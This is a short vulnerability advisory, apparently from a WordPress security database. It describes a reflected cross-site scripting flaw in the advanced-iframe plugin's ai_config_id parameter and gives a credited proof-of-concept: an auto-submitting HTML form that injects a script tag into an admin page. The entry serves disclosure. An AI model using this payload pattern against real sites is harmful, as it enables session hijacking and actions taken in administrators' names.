The plugin does not sanitise and escape the ai_config_id parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue
<html> <body> <form action="https://example.com/wp-admin/admin.php?page=advanced-iframe.php" id="hack" method="POST"> <input type="hidden" name="create-id" value="1" /> <input type="hidden" name="ai_config_id" value="<script>alert(/XSS/);</script>" /> <input type="submit" value="Submit request" /> </form> </body> <script> var form1 = document.getElementById('hack'); form1.submit(); </script> </html>
JrXnm
JrXnm
Yes
2022-02-02 (about 5 months ago)
2022-02-02 (about 5 months ago)
2022-04-09 (about 2 months ago)